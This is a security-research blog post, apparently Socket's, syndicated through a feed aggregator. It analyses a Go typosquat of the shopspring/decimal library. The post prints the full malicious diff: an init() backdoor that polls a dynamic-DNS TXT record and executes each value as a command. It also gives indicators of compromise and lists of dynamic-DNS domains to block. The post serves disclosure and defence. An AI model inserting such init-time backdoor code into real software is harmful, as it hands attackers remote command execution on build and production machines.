惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

F
Full Disclosure
月光博客
月光博客
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Y
Y Combinator Blog
有赞技术团队
有赞技术团队
PCI Perspectives
PCI Perspectives
云风的 BLOG
云风的 BLOG
MyScale Blog
MyScale Blog
Latest news
Latest news
P
Palo Alto Networks Blog
Blog — PlanetScale
Blog — PlanetScale
Cyberwarzone
Cyberwarzone
P
Privacy International News Feed
Scott Helme
Scott Helme
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
F
Fortinet All Blogs
Engineering at Meta
Engineering at Meta
V
Vulnerabilities – Threatpost
C
CXSECURITY Database RSS Feed - CXSecurity.com
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
T
Tor Project blog
S
Securelist
H
Hackread – Cybersecurity News, Data Breaches, AI and More
NISL@THU
NISL@THU
GbyAI
GbyAI
H
Hacker News: Front Page
博客园 - 三生石上(FineUI控件)
S
Secure Thoughts
U
Unit 42
T
The Blog of Author Tim Ferriss
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Cloudbric
Cloudbric
Microsoft Security Blog
Microsoft Security Blog
博客园 - Franky
L
LINUX DO - 最新话题
The Hacker News
The Hacker News
WordPress大学
WordPress大学
博客园 - 叶小钗
阮一峰的网络日志
阮一峰的网络日志
小众软件
小众软件
T
Threatpost
Cisco Talos Blog
Cisco Talos Blog
V
V2EX
L
LINUX DO - 热门话题
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Recorded Future
Recorded Future
K
Kaspersky official blog
S
Schneier on Security
T
The Exploit Database - CXSecurity.com
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知

Socket

White House Launches Gold Eagle Initiative to Manage Surge i... Suno Breached via Shai-Hulud Worm, Leaked Code Exposes AI Mu... Next.js moves to scheduled security releases - Socket 11 Malicious NuGet Tools Pose as Game Cheats to Drop a Windo... Compromised npm Packages in the AsyncAPI Namespace Deliver M... jscrambler npm Package Compromised in Supply Chain Attack - ... Fake Braintree NuGet Package Skims Credit Cards and Harvests... Compromised Injective SDK npm Package Exfiltrates Wallet Key... npm v12 Ships With Install Scripts Off by Default, Begins De... Malicious Go Module Exposes GitHub Malware Lure Network Span... pnpm 11.10 Hardens Registry Authentication to Block Token Re... Coordinated npm and PyPI Campaign Typosquats Popular Secure ... Node.js Considers Public Workflow for Security Reports Amid ... PolinRider: North Korea-Linked Supply Chain Campaign Expands... Risky Biz Podcast: AI Agents Are Raising the Stakes for Soft... Chrome and Firefox Extensions Posing as Free VPNs Add Clipbo... Miasma Mini Shai-Hulud Hits ImmobiliareLabs npm Packages - S... Rolldown Pulls Rust React Compiler Integration After Binary ... Miasma Mini Shai-Hulud Hits LeoPlatform npm Packages and Git... Frontier AI Is Now Critical Infrastructure - Socket The Code You Didn't Write Is Still Yours to Defend - Socket GitHub Actions Checkout Now Blocks Risky pull_request_target... Introducing Repository Access Permissions and Custom Roles -... Socket MCP Adds Org Alerts, Threat Feed Review, and Package ... Socket Firewall Now Blocks Malicious VS Code and Open VSX Ex... 140+ Mastra npm Packages Compromised in Coordinated Supply C... npm Package Uses Prompt Injection and Token Flooding to Disr... Introducing Manifest Alerts - Socket GlassWASM: WebAssembly Malware Found in Trojanized Open VSX ... Socket for Linear Is Now Available - Socket US Government Forces Anthropic to Pull Claude Fable Days After Launch 152 Chrome Live Wallpaper Extensions Hid Ad Tracking and Faked Google Search Traffic Andrew Becherer Joins Socket as Chief Information Security Officer Socket Partners with Replit to Block Malicious Packages in AI-Powered Development npm Tooling Bug Incorrectly Marks One-Character Packages as Security Holders Mini Shai-Hulud, Miasma, and Hades Worms Target Bioinformatics and MCP Developers via Malicious PyPI Wheels Shai-Hulud Descends to Hades: Miasma Worm Campaign Spreads with New PyPI Wave RubyGems Adds Cooldown Feature to Bundler for Newly Published Gems RubyGems Adds Cooldown Feature to Bundler for Newly Published Gems pnpm 11.5 Adds Support for Recognizing npm Staged Publishes pnpm 11.5 Adds Support for Recognizing npm Staged Publishes Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog Mini Shai-Hulud Campaign Hits Red Hat Cloud Services npm Packages Mini Shai-Hulud Campaign Hits Red Hat Cloud Services npm Packages Famous Chollima Targets PHP Developers Through Compromised Packagist Package Famous Chollima Targets PHP Developers Through Compromised Packagist Package Rust Moves to Restrict LLM Use in Contributions After Months of Internal Debate Rust Moves to Restrict LLM Use in Contributions After Months of Internal Debate Malicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and Passwords Malicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and Passwords Feross on TBPN: Socket's Series C and the State of Software Supply Chain Security Feross on TBPN: Socket's Series C and the State of Software Supply Chain Security OSV Withdraws 157 Malware Reports After Automated False Positives Hit npm and PyPI OSV Withdraws 157 Malware Reports After Automated False Positives Hit npm and PyPI TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io Laravel Lang Compromised with RCE Backdoor Across 700+ Versions Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects AI Has Taken Over Open Source npm Invalidates Granular Access Tokens as Mini Shai-Hulud Sweeps the Registry Coruna Respawned: Compromised art-template npm Package Leads to iOS Browser Exploit Kit Socket raises $60M Series C at $1B valuation led by Thrive Capital to secure AI-driven software development Socket Raises $60M Series C at a $1B Valuation to Help Enterprises Build Securely With AI Active Supply Chain Attack Compromises @antv Packages on npm Popular node-ipc npm Package Infected with Credential Stealer TeamPCP and BreachForums Launch $1,000 Contest for Supply Chain Attacks Packagist Urges Immediate Composer Update After GitHub Actions Token Leak GemStuffer Campaign Abuses RubyGems as Exfiltration Channel Targeting UK Local Government Socket Named to Rising in Cyber 2026 List of Top Cybersecurity Startups TanStack npm Packages Compromised in Ongoing Mini Shai-Hulud Supply-Chain Attack fsnotify Maintainer Dispute Sparks Supply Chain Concerns Socket Releases Free Certified Patches for Critical vm2 Sandbox Escape 5 Malicious NuGet Packages Impersonate Chinese UI Libraries to Distribute Crypto Wallet and Credential Stealer pnpm 11 Adds Supply Chain Protection Defaults for Minimum Release Age and Exotic Subdependencies PyPI Fixes High-Severity Access Control Issues Found in Security Audit Malicious Ruby Gems and Go Modules Impersonate Developer Tools to Steal Secrets and Poison CI Mini Shai-Hulud Spreads to Packagist: Malicious Intercom PHP Package Follows npm Compromise Intercom’s npm Package Compromised in Ongoing Mini Shai-Hulud Worm Attack lightning PyPI Package Compromised in Supply Chain Attack Malicious npm Package Brand-Squats TanStack to Exfiltrate Environment Variables SAP CAP npm Packages Hit by Supply Chain Attack Socket Has Acquired Secure Annex 73 Open VSX Sleeper Extensions Linked to GlassWorm Show New Malware Activations Introducing Reachability for PHP Introducing Data Exports Malicious Checkmarx Artifacts Found in Official KICS Docker Repository and Code Extensions Introducing Organization Notifications in Socket Introducing Reports: An Extensible Reporting Framework for Socket Data Socket for Jira Is Now Available Socket Named Top Sales Organization by RepVue NIST Officially Stops Enriching Most CVEs as Vulnerability Volume Skyrockets Socket Selected for OpenAI's Cybersecurity Grant Program Feross on the 10 Minutes or Less Podcast: Nobody Reads the Code 108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure Node.js Drops Bug Bounty Rewards After Funding Dries Up The Hidden Blast Radius of the Axios Compromise
Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor
Kush Pandya · 2026-05-20 · via Socket

Sidebar CTA Background

Secure your dependencies with us

Socket proactively blocks malicious open source packages in your code.

Install

Socket's Threat Research Team identified a malicious Go module published as github.com/shopsprint/decimal, a typosquat of the widely used github.com/shopspring/decimal arbitrary precision arithmetic library. The typosquatted module has been present on the Go ecosystem since 2017-11-08 and was weaponized on 2023-08-19 when version v1.3.3 added a malicious init() function that opens a DNS TXT record command and control channel to a threat actor controlled subdomain on a free dynamic DNS provider. The GitHub repository and the shopsprint owner account have since been removed, but the malicious release remains permanently served by proxy.golang.org and listed on pkg.go.dev.

Socket’s AI scanner flagging github.com/shopsprint/decimal as known malware, and catching the DNS TXT backdoor.

Quick breakdown of the threat:

  • Typosquat of github.com/shopspring/decimal swapping the final g for a t (shopspring to shopsprint)
  • Eight tagged releases between 2017 and 2023, first seven non-malicious, v1.3.3 weaponized.
  • Version v1.3.3 published 2023-08-19 contains an init() function that runs at process start with no opt-in
  • DNS TXT record C2 beacon to dnslog-cdn-images[.]freemyip[.]com, polled every five minutes
  • Each returned TXT value is passed directly to os/exec.Command and executed
  • GitHub source repository deleted, owner account deleted, but the Go Module Proxy cache continues to serve the malicious version on demand to any developer who fetches the module path

The shopspring/decimal Package#

github.com/shopspring/decimal is a Go arbitrary precision fixed-point decimal library, depended on across the Go ecosystem in financial, billing, cryptocurrency, and analytics codebases because Go's native float64 cannot represent monetary values without rounding error. Public adoption signals for the typosquat are limited, but the legitimate github.com/shopspring/decimal module has 38,634 known importers on pkg.go.dev, making it a high-value target for a single-character typosquat. The legitimate package has no network code, no process execution code, and no init() function. Its imports are limited to database/sql/driverencoding/binaryfmtmathmath/bigregexpstrconv, and strings.

The typosquatted module github.com/shopsprint/decimal preserves the entire public API and source body of shopspring/decimal. Any project that fetches the typosquat path (most commonly through a single-letter typo in go.mod, an import statement, a go get invocation, or an autocomplete suggestion) continues to compile, pass tests, and behave correctly for arithmetic. The malicious behavior runs in a separate goroutine, never touches the decimal arithmetic code paths, and never produces user-visible output.

Side-by-side pkg.go.dev listings show the typosquat (left) github.com/shopsprint/decimal next to the legitimate (right)github.com/shopspring/decimal. The two repository paths differ by a single character at the end of the vendor name.

Release Timeline and the Trust-Then-Poison Pattern#

The shopsprint/decimal module was published with eight tagged versions over six years:

  • v1.0.0 published 2017-11-08, source mirror only
  • v1.0.1 published 2018-03-01, source mirror only
  • v1.1.0 published 2018-07-09, source mirror only
  • v1.2.0 published 2020-04-28, source mirror only
  • v1.3.0 published 2021-10-13, source mirror only
  • v1.3.1 published 2021-10-20, source mirror only
  • v1.3.2 published 2023-08-19 09:20:28 UTC, includes legitimate bugfixes mirrored from upstream
  • v1.3.3 published 2023-08-19 09:27:21 UTC, introduces the malicious init() function

The first seven releases are non-malicious typosquat copies of the upstream shopspring/decimal tree at the matching version. Their cadence mirrored upstream tag dates, giving the package the appearance of a maintained fork rather than an obviously staged supply chain attack. In reality, the package appears to have been a long-running typosquat that remained benign for years before being weaponized.

The two malicious-window releases are seven minutes apart on the same day. v1.3.2 carries only two legitimate, low-impact bugfixes (a one-character comment typo correction and an arithmetic precision fix in Decimal.Mod) that the threat actor copied from upstream commits. v1.3.3 retains those two fixes and adds the payload. This is the trust-then-poison pattern observed in prior Go module supply chain campaigns. A benign release is shipped to establish recent activity, then the malicious release follows within minutes, ensuring that any developer who looked at the package the previous day and re-checks it on the day of poisoning sees a recent, legitimate-looking commit alongside the malicious one.

The combined effect is roughly six years of benign typosquat presence followed by approximately thirty-three months of weaponized presence in the open Go module ecosystem before disclosure.

How the Backdoor Triggers on Import#

Three changes are spliced into decimal.go between v1.3.2 and v1.3.3: an extended import list, a malicious init() function, and a spurious main() declared inside the decimal package.

The unified diff between v1.3.2 and v1.3.3 of decimal.go (from the Go Module Proxy zip artifacts) is the full payload:

--- decimal.go (v1.3.2)
+++ decimal.go (v1.3.3)
@@ -25,6 +25,9 @@
 	"regexp"
 	"strconv"
 	"strings"
+	"net"
+	"os/exec"
+	"time"
 )

@@ -505,6 +508,25 @@
 	}
 }

+func init(){
+	go func(){
+
+		for {
+			records, err := net.LookupTXT("dnslog-cdn-images.freemyip.com")
+			if err != nil {
+				time.Sleep(5 * time.Minute)
+				continue
+			}
+			for _, txt := range records {
+				cmd := exec.Command(txt)
+				cmd.CombinedOutput()
+			}
+			time.Sleep(5 * time.Minute)
+		}
+
+	}()
+}
+
 // Neg returns -d.

@@ -1902,3 +1924,6 @@
 	}
 	return y
 }
+func main(){
+
+}

Three observations on the payload from this diff.

  1. Imports added. The trojanized file adds netos/exec, and time to the import block. None are present in the upstream shopspring/decimal source at any tagged version. A decimal arithmetic library has no documented reason to perform DNS resolution or process execution, so a side-by-side import diff against upstream is a high-precision detection heuristic on its own.
  2. init() runs the C2 loop in a background goroutine. Go's package initialization model guarantees that every init() in a package runs before main() and before any exported function of the package becomes callable, so importing the typosquatted module anywhere in a project's dependency graph is sufficient to start the loop. The goroutine survives for the lifetime of the process, polls net.LookupTXT("dnslog-cdn-images.freemyip.com") every five minutes, and sleeps on DNS failure without logging or signaling an error.
  3. TXT records drive arbitrary command execution. Each TXT value returned by the C2 subdomain is passed directly to exec.Command(txt) and run via CombinedOutput(). The output is captured and discarded, and no shell metacharacters are interpreted, so each TXT must resolve to a single executable already present on the victim or staged earlier through another vector. DNS TXT is a covert channel rather than a transport: TXT lookups look like normal DNS activity to most egress controls, including environments that block outbound HTTP. The threat actor changes the TXT value through their DDNS account, and victims pick up the new command on the next five-minute tick.

The appended func main(){} is anomalous and non-functional. A main function is only treated as a program entry point when its file declares package main; this file declares package decimal, so func main(){} is dead code that the Go compiler will not invoke under any normal build configuration. Its presence is best read as a development artifact left behind by the threat actor, possibly copied from a single-file Go scratchpad or generated by an AI coding assistant when scaffolding a runnable example, then never cleaned up. The signal value is that the file shows signs of sloppy authorship rather than carefully constructed library code, which is consistent with malicious provenance

Command and Control Infrastructure#

The single hardcoded indicator in the payload is dnslog-cdn-images[.]freemyip[.]com. VirusTotal first analyzed the subdomain on 2024-08-07 and currently returns an A record of 8.8.8.8. The 8.8.8.8 value is a decoy, pointing the subdomain at Google Public DNS so that any tooling resolving the host gets a routable address while the operator continues to drive the payload exclusively through TXT records. The infrastructure is staged but the trojanized release has not been picked up by sandboxes or automated scanners on the public observation surfaces queried.

The parent domain freemyip[.]com is a free dynamic DNS service. The provider itself is legitimate. The same provider hosts a substantial volume of abusive subdomains: VirusTotal Intelligence returns at least 40 subdomains of freemyip[.]com with one or more malicious detections, including phishing pages impersonating PayPal, Sberbank, and MetaMask, a cluster of DGA-tagged hosts, and persistent C2 nodes with detection counts as high as 14 across the AV stack. None of those clusters thematically overlap with the Go supply chain target of the present trojan, which is consistent with a separate operator standing up a fresh, low-noise subdomain on a known-abused but unrestricted DDNS provider.

VirusTotal Intelligence URL listing for freemyip[.]com shows a sample of abusive URLs hosted under the dynamic DNS provider, including phishing kits impersonating PayPal, Sberbank, and MetaMask, DGA-style randomized hostnames, and persistent C2 or fraud subdomains.

Operational characteristics worth noting. The choice of free DDNS gives the operator full control to swap the C2 record value in seconds with no registrar friction. The parent domain's reputation is mixed (32 undetected, 60 harmless engine verdicts), which prevents bulk-blocking by reputation alone. The use of TXT records instead of A records or HTTPS traffic evades the controls most likely to fire on a developer machine, where outbound HTTP is often inspected but outbound DNS is rarely scrutinized.

Go Module Proxy Persistence#

The Go Module Proxy at proxy.golang.org continues to serve every published version of the module on demand, including the malicious v1.3.3, because the proxy intentionally caches module artifacts indefinitely as part of Go's reproducibility guarantee. Listing the versions returns all eight tags. Fetching the v1.3.3 zip returns the same bytes that were originally published. A developer running go get github.com/shopsprint/decimal@v1.3.3 before the withdrawal received the malicious code with no warning. The package is also listed on pkg.go.dev and resolves via standard Go tooling.

This is the same persistence model abused by the boltdb-go/bolt typosquat reported by Socket in 2025, where the source repository was scrubbed but the proxy cache made the malicious release permanently fetchable for years afterward.

The GitHub source code repository at https://github.com/shopsprint/decimal returns HTTP 404. The owner account at https://github.com/shopsprint returns HTTP 404. The repository and the owner are both gone, presumably removed by the threat actor, by GitHub abuse response, or by an automated cleanup. The removal has no effect on the package's reachability through standard Go tooling.

Following Socket's coordinated disclosure, the Go security team moved quickly to withdraw the module from proxy.golang.org, which now returns a 403 SECURITY ERROR for every version fetch of github.com/shopsprint/decimal and closes the new-acquisition path.

Impact#

Every machine that imports github.com/shopsprint/decimal at v1.3.3 and runs the resulting binary, including CI runners, developer workstations, and production hosts, executes the init() goroutine for the lifetime of the process. From that point forward the operator has on-demand command execution against the machine, gated only by the operator's willingness to publish a TXT record. Because the payload runs as the process user, the blast radius matches the privileges of whatever binary imported the package. A CLI run by a developer inherits the developer's credentials. A containerized service inherits its mounted secrets and service account. A CI job inherits its repository tokens and deployment credentials.

The exec.Command(txt) form does not invoke a shell, so each TXT string must be a single absolute or PATH-resolved program name. This is not a meaningful limitation. The operator can drop a staged second-stage binary through any earlier channel (a previously executed command, a build-time file write, a separate stager package) and then trigger it by publishing its path in TXT. The operator can also point TXT at any binary already present on the system that produces useful side effects when run without arguments, including local privilege escalation utilities, package managers (to install backdoored packages), or service control tooling.

Persistence is automatic for the process lifetime and reattaches on every restart of any binary that imports the module. No filesystem persistence, registry change, scheduled task, or LaunchAgent is required. The persistence mechanism is the dependency itself.

The five-minute beacon and silent error handling mean an importing project can run for weeks before any operator command is delivered, with no observable artifact in process output, no entry in application logs, and no failed-DNS noise loud enough to draw attention.

The thirty-three month dwell time between weaponization (2023-08-19) and disclosure puts a long upper bound on possible exposure for any project that pinned an unverified version of shopsprint/decimal during that window.

Recommendations#

For Developers

  • Audit go.mod and go.sum in every project for the import path github.com/shopsprint/decimal. If present at any version, remove the dependency, replace with the canonical github.com/shopspring/decimal, run go mod tidy, and rebuild.
  • Verify every Go module path resolves to the canonical upstream repository before adding it. A single-letter difference (shopsprint versus shopspring) is the entire delta between a clean dependency and a long-lived backdoor.
  • Audit your dependency tree for imports of netos/exec, and time from libraries that have no documented reason to need them. A decimal math package, a slugifier, a UUID generator, or a logger has no business resolving DNS or spawning processes.
  • If you have already built or run code that pulled github.com/shopsprint/decimal@v1.3.3, treat the build host as compromised. Rotate any credentials accessible from that host (Git tokens, cloud keys, registry credentials, SSH keys), inspect outbound DNS traffic for the listed indicator, and rebuild from a clean toolchain.

For Security Teams

  • Add dnslog-cdn-images[.]freemyip[.]com to your DNS sinkhole and SIEM correlation rules. Alert on any internal host resolving the subdomain regardless of the answer's content. A single TXT query from a build agent or production host is a high-confidence indicator.
  • Baseline TXT record queries from developer and CI infrastructure. TXT lookups from build hosts to free dynamic DNS providers (freemyip[.]comduckdns[.]orgno-ip[.]comdynu[.]netddns[.]nethopto[.]orgzapto[.]org) are rare in legitimate Go toolchains and worth treating as suspicious by default.
  • Block egress to the freemyip[.]com zone from build and production environments unless you have an explicit business justification. The provider is a documented abuse magnet.
  • Scan internal Go module caches ($GOMODCACHE / $GOPATH/pkg/mod) and any go.sum files in your source repositories for the string github.com/shopsprint/decimal. Any code that was fetched before the Go security team's withdrawal remains in module caches, vendored trees, and built binaries, so dependency-graph scanning is the durable control for already-compromised supply chains.
  • For binary review, scan compiled Go binaries for the simultaneous presence of the shopspring/decimal symbol fingerprint, the net.LookupTXT symbol, the os/exec.Command symbol, and any dynamic DNS hostname. The combination is rare in legitimate Go binaries and high-precision against this class of supply chain backdoor.

Socket detects threats like this across the full dependency graph, including init-time supply chain payloads, dynamic DNS C2, and typosquatted forks of popular libraries, before they reach developer environments. The Socket GitHub App scans pull request dependency changes and flags init-time network or process execution before merge. The Socket CLI enforces allow and deny rules in CI pipelines. Socket Firewall blocks known malicious packages before they are fetched. The Socket browser extension surfaces risk signals while browsing public Go module pages. Socket MCP prevents AI-assisted coding workflows from introducing suspicious dependencies into your codebase.

MITRE ATT&CK#

  • T1195.002 - Compromise Software Supply Chain
  • T1071.004 - Application Layer Protocol: DNS
  • T1059 - Command and Scripting Interpreter
  • T1583.001 - Acquire Infrastructure: Domains
  • T1572 - Protocol Tunneling
  • T1568 - Dynamic Resolution

Indicators of Compromise (IOCs)#

Malicious Package

github.com/shopsprint/decimal (v1.3.3)

  • Malicious commit hash: 2f0ee073c6f29d66188a845592029c9b52528f04

Files

v1.3.3 module zip

  • SHA-256: dd9c0268c8944e6ddf90d4d0c81aa843785b7a9ee965faa635841ed9fc0ba086

decimal.go

  • SHA-256: 387d7ea5ca733b1e7219c943f4b461877a8df0148adfef42b1538b6c398fbb41
  • SHA1: fd26f4ca4746ee390e22043a5e19ebf2b7fcd1f9
  • MD5: e3c6ce0440d9acd0f1cef1f0da3cdb5d

Network Indicators

  • dnslog-cdn-images[.]freemyip[.]com
  • freemyip[.]com